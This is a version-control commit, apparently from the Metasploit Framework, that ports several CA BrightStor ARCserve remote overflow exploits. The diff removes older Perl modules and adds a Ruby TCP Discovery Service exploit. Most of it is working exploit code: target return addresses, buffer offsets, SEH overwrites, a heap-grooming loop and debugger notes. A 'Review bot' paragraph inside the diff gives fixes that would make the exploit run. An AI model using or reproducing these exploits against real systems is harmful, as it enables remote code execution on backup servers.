Brightstor exploits

git-svn-id: file:///home/svn/incoming/trunk@3130 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-26 22:12:54 +00:00
parent 40aa62968f
commit 1ca0837a3b
9 changed files with 498 additions and 991 deletions


@ -1,226 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
request is sent to UDP port 41524, triggering a stack
overflow.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13613'],
[ 'BID', '12491'],
[ 'CVE', '2005-0260'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
[ 'MIL', '14'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Dec 20 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_disco;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Discovery Service Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 41524],
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
request is sent to UDP port 41524, triggering a stack
overflow.
}),
'Refs' =>
[
['OSVDB', '13613'],
['BID', '12491'],
['CVE', '2005-0260'],
['URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
['MIL', '14'],
],
'Targets' =>
[
['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Dec 20 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = 41523;
# Connection #1 should not receive a response
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("META");
my $res = $s->Recv(-1, 1);
$s->Close;
if ($res) {
$self->PrintLine("[*] The discovery returned a strange response: $res");
}
# Connection #2 should receive the hostname of the target
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("hMETA");
my $res = $s->Recv(-1, 1);
$s->Close;
if (! $res) {
$self->PrintLine("[*] The discovery service did not respond to our query");
return $self->CheckCode('Generic');
}
$self->PrintLine("[*] Discovery service active on host: $res");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $bang = "X" x 4096;
# esp @ 971
# ret @ 968
# edi @ 1046
# end = 4092
substr($bang, 968, 4, pack('V', $target->[1]));
substr($bang, 1046, length($shellcode), $shellcode);
$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
$s->Send($bang);
$s->Recv(-1, 5);
return;
}
1;
=end
end
end


@ -1,243 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service SERVICEPC Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
Thor Doomen.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'MIL', '15'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Feb 14 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_disco_servicepc;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Discovery Service SERVICEPC Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 41523],
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523. This
vulnerability was discovered by cybertronic[at]gmx.net and affects
all known versions of the BrightStor product. This module is based
on the 'cabrightstor_disco' exploit by Thor Doomen.
}),
'Refs' =>
[
['OSVDB', '13814'],
['BID', '12536'],
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
['MIL', '15'],
],
'Targets' =>
[
['cheyprod.dll 12/12/2003', 0x23805714], # pop/pop/ret
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Feb 14 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
# Connection #1 should not receive a response
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("META");
my $res = $s->Recv(-1, 1);
$s->Close;
if ($res) {
$self->PrintLine("[*] The discovery returned a strange response: $res");
}
# Connection #2 should receive the hostname of the target
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("hMETA");
my $res = $s->Recv(-1, 1);
$s->Close;
if (! $res) {
$self->PrintLine("[*] The discovery service did not respond to our query");
return $self->CheckCode('Generic');
}
$self->PrintLine("[*] Discovery service active on host: $res");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $poof = Pex::Text::EnglishText(4096);
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
substr($poof, 1024, 2, "\xeb\x06");
substr($poof, 1028, 4, pack('V', $target->[1]));
substr($poof, 1032, length($shellcode), $shellcode);
# Make sure the return address is invalid to trigger SEH
substr($poof, 900, 100, chr(128 + rand()*127) x 100);
my $bang =
"\x9b".
"SERVICEPC".
"\x18".
pack('N', 0x01020304).
"SERVICEPC".
"\x01\x0c\x6c\x93\xce\x18\x18\x41".
$poof;
$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
$s->Send($bang);
# Closing the socket too early breaks the exploit
$s->Recv(-1, 5);
return;
}
1;
=end
end
end


@ -1,209 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was
discovered by cybertronic[at]gmx.net.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1272'],
[ 'BID', '14453'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
[ 'MIL', '83'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Aug 02 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_sqlagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6070],
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was discovered
by cybertronic[at]gmx.net.
}),
'Refs' =>
[
[ 'CVE', '2005-1272' ],
[ 'BID', '14453' ],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities' ],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239' ],
[ 'MIL', '83'],
],
'Targets' =>
[
# This exploit requires a jmp esp for return
['ARCServe 11.0 Asbrdcst.dll 12/12/2003', 0x20c11d64], # jmp esp
['ARCServe 11.1 Asbrdcst.dll 07/21/2004', 0x20c0cd5b], # push esp, ret
['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', 0x20c0cd1b], # push esp, ret
# From minishare exploit
['Windows 2000 SP0-SP3 English', 0x7754a3ab ], # jmp esp
['Windows 2000 SP4 English', 0x7517f163 ], # jmp esp
['Windows XP SP0-SP1 English', 0x71ab1d54 ], # push esp, ret
['Windows XP SP2 English', 0x71ab9372 ], # push esp, ret
['Windows 2003 SP0 English', 0x71c03c4d ], # push esp, ret
['Windows 2003 SP1 English', 0x71c033a0 ], # push esp, ret
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Aug 02 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The 'one line' request does not work against Windows 2003
for (my $i=0; $i <5; $i++)
{
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $crap = ("\xff" x 0x12000);
$s->Send($crap);
$s->Recv(-1, 8);
$s->Close();
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
# 3288 bytes max
# 696 == good data (1228 bytes contiguous) @ 0293f5e0
# 3168 == return address
# 3172 == esp @ 0293ff8c (2476 from good data)
my $poof = Pex::Text::EnglishText(3288);
substr($poof, 696, length($shellcode), $shellcode);
substr($poof, 3168, 4, pack('V', $target->[1])); # jmp esp
substr($poof, 3172, 5, "\xe9\x4f\xf6\xff\xff"); # jmp -2476
$self->PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");
$s->Send($poof);
$s->Recv(-1, 8);
$self->Handler($s);
$s->Close();
}
return;
}
1;
=end
end
end


@ -1,312 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Universal Agent Overflow',
'Description' => %q{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland
exception results in heap growth and execution of
dereferenced function pointer at a specified address.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 164,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003, winnt',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Universal Agent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6050],
},
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland exception
results in heap growth and execution of dereferenced function pointer
at a specified address.
}),
'Refs' =>
[
['MIL', '16'],
['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'DefaultTarget' => 0,
'Targets' => [
['Magic Heap Target #1', 0x01625c44], # far away heap address
],
'Keys' => ['brightstor'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $probe =
"\x00\x00\x00\x00\x03\x20\xbc\x02".
("2" x 256).
("A" x 32).
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B".
"\x16\x11\x14\x10\x11\x04\x03\x1C".
"\x11\x1C\x15\x01\x00\x06".
("X" x 390);
$s->Send($probe);
my $res = $s->Recv(8, 10);
$s->Close;
if ($res eq "\x00\x00\x73\x02\x32\x32\x00\x00") {
$self->PrintLine('[*] This system appears to be vulnerable');
return $self->CheckCode('Appears');
}
$self->PrintLine('[*] This system does not appear to be vulnerable');
return;
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The server reverses four bytes starting at 0xa5
# my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
# substr($shellcode, 0xa5, 4, $patchy);
# Create the request
my $boom = "X" x 1024;
# Required field to trigger the fault
substr($boom, 248, 2, pack('v', 1000));
# The shellcode, limited to 250 bytes (no nulls)
substr($boom, 256, length($shellcode), $shellcode);
# This should point to itself
substr($boom, 576, 4, pack('V', $target->[1]));
# This points to the code below
substr($boom, 580, 4, pack('V', $target->[1]+8 ));
# We have 95 bytes, use it to hop back to shellcode
substr($boom, 584, 6, "\x68" . pack('V', $target->[1]-320) . "\xc3");
# Stick the protocol header in front of our request
$boom = "\x00\x00\x00\x00\x03\x20\xa8\x02".$boom;
$self->PrintLine("[*] Sending " .length($boom) . " bytes to remote host.");
# We keep making new connections and triggering the fault until
# the heap is grown to encompass our known return address. Once
# this address has been allocated and filled, each subsequent
# request will result in our shellcode being executed.
for (1 .. 200) {
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
if ($_ % 10 == 0) {
$self->PrintLine("[*] Sending request $_ of 200...");
}
$s->Send($boom);
$s->Close;
# Give the process time to recover from each exception
select(undef, undef, undef, 0.1);
}
return;
}
1;
__END__
012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx+0x4]
Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.
If these addresses do not match up, run this exploit, then attach with WinDbg:
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1
011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01225c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01235c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01245c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01255c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01265c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01275c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01285c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01295c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01305c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01315c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01525c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01535c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01545c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01555c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01565c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01575c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01585c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01595c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
=end
end
end


@ -32,7 +32,6 @@ class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Targets' =>
[


@ -0,0 +1,122 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service TCP Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
Thor Doomen.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'MIL', '15'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23805714, # pop/pop/ret
},
],
],
'DisclosureDate' => 'Feb 14 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(41523)
], self)
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
buf = Rex::Text.rand_text_english(4096)
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
seh = generate_seh_payload(target.ret)
buf[1024, seh.len] = seh
# Make sure the return address is invalid to trigger SEH
buf[ 900, 100] = (rand(127)+128).chr * 100
# SERVICEPC is the client host name actually =P (thanks Juliano!)
req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
req << buf
sock.put(req)
sock.get_once
handler
disconnect
end
end
end
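Review bot: `seh.len` on the line `buf[1024, seh.len] = seh` in `exploit` will raise NoMethodError, because Ruby strings expose `length`/`size` and not `len`, so the module aborts before a single byte reaches the target; it should read `buf[1024, seh.length] = seh`. The Perl `Check` this file replaces tested `$s->IsError` and returned a Connect check code, whereas the new `check` lets a failed connection to RPORT propagate out of `Rex::Socket::Tcp.create` (presumably it raises on refusal — confirm against Rex) instead of returning a check code, so wrapping both probes in `begin … rescue ::Exception … return Exploit::CheckCode::Safe … end` would restore the old behaviour. Note also that the `csock.close` calls are skipped whenever `put`/`get_once` raise, leaking the socket for the rest of the session.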


@ -0,0 +1,114 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
